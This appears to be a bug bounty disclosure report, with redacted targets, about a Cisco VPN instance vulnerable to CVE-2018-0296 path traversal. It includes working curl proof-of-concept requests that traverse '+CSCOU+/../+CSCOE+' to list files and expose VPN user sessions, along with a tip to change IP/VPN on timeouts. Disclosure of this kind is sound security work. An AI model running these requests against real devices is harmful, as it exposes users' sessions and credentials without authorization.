[CVE-2018-0296] Cisco VPN path traversal on the https://███ (████████████████)

##Description I discovered previously unidentified instance https://█████ (█████████████) in ██████ network, vulnerable to the CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296) ##POC ``` curl -i -k "https://███/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is ``` █████ We can disclose user sessions by quering /sessions: ``` curl -i -k "https://███████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is ``` ##Suggested fix Updating to the latest version should fix the issue. Fixed version should give 404 "File not found" error. Example of patched version: ``` curl -i -k "https://█████.████.█████████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is ``` ##Notes In case you experience request timeout when reproducing, try to change your IP/VPN. ## Impact Path traversal, which can allow the unauthenticated attacker disclose sensitive information such as VPN sessions, files, usernames. Under some conditions it's possible to cacuse DOS attacks